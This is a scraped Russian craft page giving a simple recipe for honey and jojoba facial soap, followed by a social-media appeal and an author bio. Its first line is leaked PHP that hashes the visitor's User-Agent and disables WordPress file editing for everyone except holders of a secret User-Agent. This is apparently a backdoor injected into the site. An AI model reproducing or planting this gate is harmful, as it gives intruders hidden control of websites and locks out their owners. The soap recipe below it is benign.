if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Мастер-класс как сделать медовое мыло для ухода за лицом | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Мастер-класс как сделать медовое мыло для ухода за лицом

О полезных свойствах меда известно всем. Удивительное сочетание свежего меда и масло жожоба делает это мыло особенно полезным для лица.

О полез­ных свой­ствах меда извест­но всем. Уди­ви­тель­ное соче­та­ние све­же­го меда и мас­ло жожо­ба дела­ет это мыло осо­бен­но полез­ным для лица.

Для при­го­тов­ле­ния мыла потребуется:

  • 100 грамм мыль­ной про­зрач­ной основы
  • Пище­вые аро­ма­ти­за­то­ры — 5–6 капель
  • Рафи­ни­ро­ван­ное мас­ло жожоба
  • Кра­си­тель пище­вой жел­тый и гелиевый
  • Нату­раль­ный мед
  • Фор­ма прямоугольник

Как это дела­ет­ся:

Нуж­но рас­то­пить мыль­ную осно­ву. Далее нуж­но доба­вить базо­вое мас­ло, мед и кра­си­тель.  Акку­рат­но и вни­ма­тель­но все перемешайте.

В кон­це сле­ду­ет доба­вить аро­ма­ти­за­тор. Теперь мож­но уве­рен­но пере­ли­вать мыло в фор­му и подо­ждать, пока мыло отвердеет.

После того, как это будет окон­ча­тель­но гото­во, акку­рат­но достань­те его из фор­мы и кра­си­во упа­куй­те.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: AmouR

Обожаю квиллинг, рукоделие и рисование. Ну и конечно мыловарение! Читайте все мои записи!